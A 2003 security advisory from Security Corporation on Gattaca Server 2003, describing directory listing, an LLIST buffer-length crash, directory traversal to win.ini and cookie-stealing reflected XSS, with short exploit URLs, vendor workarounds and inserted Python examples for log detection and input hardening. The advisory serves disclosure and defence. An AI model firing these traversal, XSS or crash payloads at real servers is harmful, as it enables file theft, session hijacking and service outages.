SCSA019.txt

πŸ—“οΈΒ 11 Jul 2003Β 00:00:00Reported byΒ Gregory Le BrasTypeΒ 
packetstorm
Β packetstorm
πŸ”—Β packetstormsecurity.comπŸ‘Β 19Β Views

Gattaca Server 2003 has multiple vulnerabilities allowing file exposure and Denial of Service risks.


Code
`=====================================================================  
Security Corporation Security Advisory [SCSA-019]  
  
Gattaca Server 2003 Vulnerable to Multiple vulnerabilities  
=====================================================================  
  
PROGRAM: Gattaca Server 2003  
HOMEPAGE: www.gattaca-server.com  
VULNERABLE VERSIONS: 1.0.8.1 and prior ?  
RISK: Low/Medium  
IMPACT: Show file and directory content  
        Denial of Service  
        Directory Traversal  
        Cross Site Scripting  
RELEASE DATE: 2003-07-10  
  
Security Corporation's Free weekly Newsletter :  
http://www.security-corporation.com/newsletter.html  
  
=====================================================================  
TABLE OF CONTENTS  
=====================================================================  
  
1..........................................................DESCRIPTION  
2..............................................................DETAILS  
3.............................................................EXPLOITS  
4............................................................SOLUTIONS  
5...........................................................WORKAROUND  
6..................................................DISCLOSURE TIMELINE  
7..............................................................CREDITS  
8...........................................................DISCLAIMER  
9...........................................................REFERENCES  
10............................................................FEEDBACK  
  
1. DESCRIPTION  
=====================================================================  
  
Gattaca Server is "A high performance Windows NT based Mail and Web  
Server software for building own intranet. You may register unlimited  
users, use unlimited domains. Supporting POP3, SMTP, and HTTP  
protocols.  
Integrated with TMPL library, allow you write own CGI scripts"  
  
(direct quote from http://www.gattaca-server.com/)  
  
  
2. DETAILS  
=====================================================================  
  
- Shows file and directory content :  
  
When a GET request is sent for a path containing two slashes ("//"), the  
server returns a listing of the directory's contents. An attacker can thus  
see all hidden (not HTML-linked) files and directories on the server.  
  
  
- Denial of Service :  
  
A security vulnerability in Gattaca Server 2003 allows remote and  
local attackers to crash the server by issuing a specific command  
(LLIST) with an argument of 1048 bytes in length or more.  
  
The command can be issued to the server through the Gattaca Console  
(C:\WINNT\system32\gattaca.exe).  
  
  
- Directory Traversal :  
  
A security vulnerability in Gattaca Server 2003 allows remote  
attackers to gain access to system files.  
  
  
- Cross Site Scripting :  
  
An exploitable bug was found in Gattaca Server 2003 which causes  
script execution on the client's computer when a crafted URL is followed.  
  
This kind of attack, known as a "Cross-Site Scripting Vulnerability",  
is present in the view2.tmpl file: an attacker can inject specially crafted  
links and/or other malicious scripts.  
  
  
  
  
3. EXPLOIT  
=====================================================================  
  
- Show file and directory content :  
  
http://[target]//  
  
You will get this :  
http://www.security-corporation.com/download/SCSA-019.png  
  
  
- Denial of Service :  
  
In Gattaca Console :  
  
$> LLIST AAAA...[1024]...AAAA  
  
ggesvr32.exe crashes at once.  
  
  
- Directory Traversal :  
  
http://[target]/view.tmpl?testfile=../../winnt/win.ini  
  
  
- Cross Site Scripting :  
  
http://[target]/view2.tmpl?text=[hostile_code]  
  
The hostile code could be :  
  
[script]alert("Cookie="+document.cookie)[/script]  
  
(opens a window showing the visitor's cookie.)  
  
(replace [] by <>)  
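The three web-exposed issues above leave distinctive traces in an HTTP access log. The following is an added example (not part of the advisory) that classifies request lines by those traces; the log format and the IP addresses are constructed sample data:

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample access-log lines (not from the advisory): one request per
# web-exposed issue in SCSA-019, plus a benign request.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jul/2003:12:00:01 +0200] "GET // HTTP/1.0" 200 1532
10.0.0.5 - - [10/Jul/2003:12:00:02 +0200] "GET /view.tmpl?testfile=../../winnt/win.ini HTTP/1.0" 200 412
10.0.0.5 - - [10/Jul/2003:12:00:03 +0200] "GET /view2.tmpl?text=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.0" 200 98
10.0.0.7 - - [10/Jul/2003:12:00:04 +0200] "GET /index.html HTTP/1.0" 200 2048
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
SCRIPT_RE = re.compile(r"<\s*/?script|javascript:", re.IGNORECASE)

def classify_request(target):
    """Return which SCSA-019 issue a request target matches, or None."""
    raw_path, _, query = target.partition("?")
    path = unquote(raw_path)
    # parse_qs percent-decodes values itself, so %3Cscript%3E becomes <script>
    values = [v for vals in parse_qs(query, keep_blank_values=True).values() for v in vals]
    if "//" in path:                          # double slash -> directory index exposure
        return "directory-listing"
    if ".." in path or any(".." in v for v in values):
        return "directory-traversal"          # view.tmpl?testfile=../../winnt/win.ini
    if any(SCRIPT_RE.search(v) for v in values):
        return "reflected-xss"                # view2.tmpl?text=<script>...
    return None

def scan_log(text):
    """Return (client_ip, target, issue) for every suspicious request line."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        issue = classify_request(m.group("target"))
        if issue:
            hits.append((line.split()[0], m.group("target"), issue))
    return hits

if __name__ == "__main__":
    for client, target, issue in scan_log(SAMPLE_LOG):
        print(f"{client} {issue}: {target}")
```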
  
  
  
  
  
4. SOLUTIONS  
=====================================================================  
  
No solution for the moment. The vendor will fix the bugs in the next release.  
  
  
5. WORKAROUND  
=====================================================================  
  
- Show file and directory content :  
  
Vendor response :  
  
To fix this issue, you also need to perform an additional task  
  
http://[target]//  
  
2 ways:  
  
1) Open %systemroot%\gattaca.ini in Notepad and remove the extension for the  
configuration file  
  
====================================  
[GATTACA]  
PATH=C:\GeeOSPub  
ENVIRONMENT=C:\GeeOSPub\wwwroot\.config  
SITE=C:\GeeOSPub\wwwroot\.config  
====================================  
  
The last 2 strings may be removed; restarting is not needed.  
New configuration settings will be updated by Gattaca  
Server in 15 seconds.  
  
====================================  
[GATTACA]  
PATH=C:\GeeOSPub  
#ENVIRONMENT=C:\GeeOSPub\wwwroot\.config  
#SITE=C:\GeeOSPub\wwwroot\.config  
====================================  
  
but you will have a problem with the site sample, and the best way is:  
  
2) You may update the C:\GeeOSPub\wwwroot\.config file too; it also has the  
structure  
  
=====================  
[HTTPFOLDER]  
/=1  
=====================  
  
Change it to  
  
=====================  
[HTTPFOLDER]  
/=0  
=====================  
  
Also, if you need to view the directory index of any folder, append your  
variables, which look like:  
  
<url>=<status>  
  
where status 1 allows viewing and 0 disables viewing.  
For example:  
  
[HTTPFOLDER]  
/=0  
/pub=1  
/pub/private=0  
  
Also, it is impossible to view files starting with a dot (like .config etc.); if  
any clients want to hide some files from the directory index they should start  
the file names with a dot. It's by design.  
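To audit a site's .config against the vendor's [HTTPFOLDER] convention above, here is an added example (not Gattaca's own code) that parses the section and reports which URL prefixes expose a directory index. The longest-prefix inheritance rule for nested entries is an assumption, since the vendor's text only shows per-entry values; the sample file contents are constructed.

```python
import configparser

# Constructed .config contents in the vendor's [HTTPFOLDER] format
# (example values, not a real site's file).
SAMPLE_CONFIG = """\
[HTTPFOLDER]
/=0
/pub=1
/pub/private=0
"""

def load_httpfolder(config_text):
    """Parse the [HTTPFOLDER] section into {url_prefix: listing_allowed}."""
    parser = configparser.ConfigParser()
    parser.optionxform = str          # keep URL prefixes case-sensitive
    parser.read_string(config_text)
    if "HTTPFOLDER" not in parser:
        return {}
    return {url: value.strip() == "1" for url, value in parser["HTTPFOLDER"].items()}

def listing_enabled(folders, url_path):
    """Effective directory-index status for url_path.

    Assumption (not stated by the vendor): the most specific configured
    prefix wins, so /pub/private=0 overrides /pub=1 for /pub/private/x.
    A path matching no entry is treated as disabled."""
    best = None
    for prefix, allowed in folders.items():
        norm = prefix.rstrip("/") or "/"
        if url_path == norm or url_path.startswith(norm.rstrip("/") + "/"):
            if best is None or len(norm) > len(best[0]):
                best = (norm, allowed)
    return best[1] if best else False

def audit(config_text):
    """Return the sorted list of prefixes whose directory index is exposed."""
    folders = load_httpfolder(config_text)
    return sorted(p for p, allowed in folders.items() if allowed)

if __name__ == "__main__":
    print("exposed prefixes:", audit(SAMPLE_CONFIG))
```

A site still on the sample's `/=1` shows up as `['/']`, i.e. every folder listable.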
  
  
- Denial of Service :  
  
Vendor response :  
  
For the LLIST command, this is a real problem too. But it is possible to limit  
access to the computer where Gattaca Server is installed.  
  
- Directory Traversal :  
  
Remove view.tmpl  
  
  
- Cross Site Scripting :  
  
Use the PHP function eregi_replace to filter the input data, or  
remove view2.tmpl  
  
Vendor response :  
  
For the exploit (http://[target]/view2.tmpl?text=[hostile_code]) it is not a  
bug, because the response to this GET/POST request is received only by the  
attacker. And it is impossible to control the server response to other  
client(s). It's by design. This script (view2.tmpl) is made for this purpose  
(allowing the end-user to insert their own code/text into the output HTML), and  
if this works it is fine. This means that Gattaca Server is properly configured  
and works well. In our opinion this is not a bug or exploit; it is possible to  
send data to this script using GET/POST (POST is better because the client can  
send more data)  
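Since the vendor leaves view.tmpl and view2.tmpl as they are, the server-side fixes fall to the operator. The following added example (not Gattaca code; a POSIX-style web root is assumed and parameters are assumed already URL-decoded) shows a path check that rejects the testfile traversal from section 3, and an escaping render function next to the reflecting behaviour the advisory describes for view2.tmpl:

```python
import html
import posixpath

# Assumed web root. The advisory's real path is C:\GeeOSPub\wwwroot; a POSIX
# form is used here so the purely lexical check runs on any platform.
WEB_ROOT = "/GeeOSPub/wwwroot"

def resolve_testfile(param, web_root=WEB_ROOT):
    """Return the normalized path for view.tmpl's testfile parameter, or None
    when it would escape web_root. The parameter is assumed URL-decoded."""
    candidate = param.replace("\\", "/")            # Windows separators count too
    full = posixpath.normpath(posixpath.join(web_root, candidate.lstrip("/")))
    if full != web_root and not full.startswith(web_root + "/"):
        return None                                  # ../../winnt/win.ini ends up here
    return full

def render_view2_vulnerable(text):
    """Reflects the text parameter verbatim: the behaviour SCSA-019 describes."""
    return f"<html><body>{text}</body></html>"

def render_view2_hardened(text):
    """Escapes the parameter so browsers treat it as text, never as markup."""
    return f"<html><body>{html.escape(text, quote=True)}</body></html>"

if __name__ == "__main__":
    print(resolve_testfile("../../winnt/win.ini"))   # None: rejected
    print(render_view2_hardened("<b>hi</b>"))
```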
  
  
6. DISCLOSURE TIMELINE  
=====================================================================  
  
08/07/2003 Vulnerability discovered  
08/07/2003 Vendor notified  
09/07/2003 Vendor response  
09/07/2003 Security Corporation clients notified  
09/07/2003 Started e-mail discussions  
10/07/2003 Last e-mail received  
10/07/2003 Public disclosure  
  
  
7. CREDITS  
=====================================================================  
  
Discovered by Gregory Le Bras <[email protected]>  
  
  
8. DISCLAIMER  
=====================================================================  
  
The information within this paper may change without notice. Use of  
this information constitutes acceptance for use in an AS IS condition.  
There are NO warranties with regard to this information. In no event  
shall the author be liable for any damages whatsoever arising out of  
or in connection with the use or spread of this information. Any use  
of this information is at the user's own risk.  
  
  
9. REFERENCES  
=====================================================================  
  
- Original Version:  
http://www.security-corporation.com/advisories-019.html  
  
- French Version:  
http://www.security-corporation.com/index.php?id=advisories&a=019-FR  
  
  
10. FEEDBACK  
=====================================================================  
  
Please send suggestions, updates, and comments to:  
  
Security Corporation  
http://www.security-corporation.com  
[email protected]  
  
  
  
  
  
`

Vulners AI Score: 7.4 (High risk)